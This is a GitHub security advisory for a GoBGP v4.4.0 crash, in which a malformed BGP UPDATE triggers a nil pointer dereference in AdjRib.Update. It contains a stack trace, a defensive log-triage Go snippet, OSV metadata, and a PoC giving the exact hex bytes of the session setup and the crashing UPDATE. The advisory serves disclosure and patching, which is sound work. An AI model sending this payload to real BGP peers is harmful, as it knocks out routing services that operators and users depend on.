GHSA-P3W2-64XM-833J
Vulnerability from github – Published: 2026-05-05 20:57 – Updated: 2026-05-08 20:42
Summary
Remote Denial of Service (DoS) via Nil Pointer Dereference in BGP Update Processing
An unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a "withdraw" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability.
Details
The vulnerability originates in the interaction between the BGP message decoding logic and the Adj-RIB table management.
Triggering Condition: When a BGP UPDATE message contains attributes that fail validation (e.g., "attribute value length is short"), GoBGP logs a warning: "the received Update message was treated as withdraw".
Code Path:
The message reaches github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate.
Due to the malformed attributes, the message is processed as a withdrawal, but the internal representation of the path or its attributes becomes nil.
The execution flows to internal/pkg/table/adj.go:127 within (*AdjRib).Update.
The Flaw: At line 127 in adj.go, the code attempts to access a member of a structure (likely the path or a specific attribute container) that is nil due to the previous validation failure.
Log Snippet:
```
{"time":"2026-04-21T12:43:10.009107962+08:00","level":"WARN","msg":"the received Update message was treated as withdraw","Topic":"Peer","Key":"192.168.31.195","State":"BGP_FSM_ESTABLISHED","Error":"attribute value length is short"}
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0xbca9e8]

goroutine 52 [running]:
github.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})
	/home/base/Desktop/gobgp/internal/pkg/table/adj.go:127 +0xa8
github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate(0x1fec92b90c40, 0x1fec92c0c900)
	/home/base/Desktop/gobgp/pkg/server/peer.go:656 +0xed4
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).handleFSMMessage(0x1fec928c8488, 0x1fec92b90c40, 0x1fec92c0c900)
	/home/base/Desktop/gobgp/pkg/server/server.go:1670 +0x14c6
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).startFsmHandler.func1(0x1fec935c0b00?)
	/home/base/Desktop/gobgp/pkg/server/server.go:253 +0x25
github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).recvMessageloop(0x1fec92acee40, {0x105c750, 0x1fec92970500}, {0x106a558, 0x1fec933bc000}, 0x1fec92c1a2a0, 0x1fec92c18a10, 0x0?)
	/home/base/Desktop/gobgp/pkg/server/fsm.go:1893 +0xe82
created by github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).established in goroutine 37
	/home/base/Desktop/gobgp/pkg/server/fsm.go:1920 +0x2d5
```
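For operators triaging a crashed daemon, the log pattern above can be matched mechanically. The following is an added example, not GoBGP code or part of the advisory: it flags nil-dereference panics whose trace passes through AdjRib.Update and names the peer from the last "treated as withdraw" warning. The names Triage and Finding and the 192.0.2.10 sample line are assumptions made for illustration.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"strings"
)

const ( // markers copied from the advisory's log snippet
	withdrawMsg = "the received Update message was treated as withdraw"
	panicPrefix = "panic: runtime error: invalid memory address or nil pointer dereference"
	crashFrame  = "table.(*AdjRib).Update("
)

type Finding struct{ Peer, Time, Error string } // peer whose malformed UPDATE preceded the crash

// Triage reports each nil-dereference panic with AdjRib.Update in its trace, attributed
// (heuristically: peers can interleave) to the last "treated as withdraw" warning.
func Triage(log string) []Finding {
	var out []Finding
	last, inPanic := Finding{Peer: "unknown"}, false
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		var rec struct{ Time, Msg, Key, Error string } // JSON keys match case-insensitively
		switch {
		case strings.HasPrefix(line, "{") && json.Unmarshal([]byte(line), &rec) == nil:
			inPanic = false // a structured log line means the daemon is running (again)
			if rec.Msg == withdrawMsg {
				last = Finding{Peer: rec.Key, Time: rec.Time, Error: rec.Error}
			}
		case strings.HasPrefix(line, panicPrefix):
			inPanic = true
		case inPanic && strings.Contains(line, crashFrame):
			out = append(out, last)
			last, inPanic = Finding{Peer: "unknown"}, false
		}
	}
	return out
}

// Sample input: one constructed earlier warning (peer 192.0.2.10), then the advisory's log, trimmed.
const sampleLog = `{"time":"2026-04-21T12:40:00+08:00","level":"WARN","msg":"the received Update message was treated as withdraw","Topic":"Peer","Key":"192.0.2.10","State":"BGP_FSM_ESTABLISHED","Error":"attribute value length is short"}
{"time":"2026-04-21T12:43:10.009107962+08:00","level":"WARN","msg":"the received Update message was treated as withdraw","Topic":"Peer","Key":"192.168.31.195","State":"BGP_FSM_ESTABLISHED","Error":"attribute value length is short"}
panic: runtime error: invalid memory address or nil pointer dereference
github.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})`

func main() { fmt.Printf("%+v\n", Triage(sampleLog)) }
```

A finding identifies which session to review or shut down while the upgrade to the fixed release is rolled out; it is not proof that the named peer sent the triggering message.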
PoC
```
[SEND] OPEN
  Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 1d 01 04 fd ea 00 5a c3 a8 1f c3 00
[RECV] Type: 1 | Length: 77
  Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 4d 01 04 fd e9 00 5a c0 a8 1f 82 30 02 2e 02 00 49 16 14 62 61 73 65 2d 76 69 72 74 75 61 6c 2d 6d 61 63 68 69 6e 65 00 01 04 00 19 00 46 41 04 00 00 fd e9 05 06 00 19 00 46 00 02
[+] Received OPEN from peer
[SEND] KEEPALIVE
  Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[RECV] Type: 4 | Length: 19
  Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[+] BGP Session Established
[SEND] Crafted UPDATE
  Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 50 02 00 04 18 ac 10 01 00 35 35 01 01 04 2d 02 00 90 0e 00 19 3e 01 a8 c0 1f 82 00 02 21 00 01 c0 a8 1f 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 11 22 33 44 55 0f 11 80 00
[*] Waiting for peer reaction...
[+] Done.
```
Impact
Remote Denial of Service (DoS) in GoBGP v4.4.0
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/osrg/gobgp/v4"
},
"ranges": [
{
"events": [
{
"introduced": "4.4.0"
},
{
"fixed": "4.5.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"4.4.0"
]
}
],
"aliases": [
"CVE-2026-42285"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T20:57:14Z",
"nvd_published_at": "2026-05-07T12:16:18Z",
"severity": "HIGH"
},
"id": "GHSA-p3w2-64xm-833j",
"modified": "2026-05-08T20:42:39Z",
"published": "2026-05-05T20:57:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/osrg/gobgp/security/advisories/GHSA-p3w2-64xm-833j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42285"
},
{
"type": "PACKAGE",
"url": "https://github.com/osrg/gobgp"
},
{
"type": "WEB",
"url": "https://github.com/osrg/gobgp/releases/tag/v4.5.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "GoBGP has a panic in AdjRib.Update via malformed BGP Update message (Nil Pointer Dereference)"
}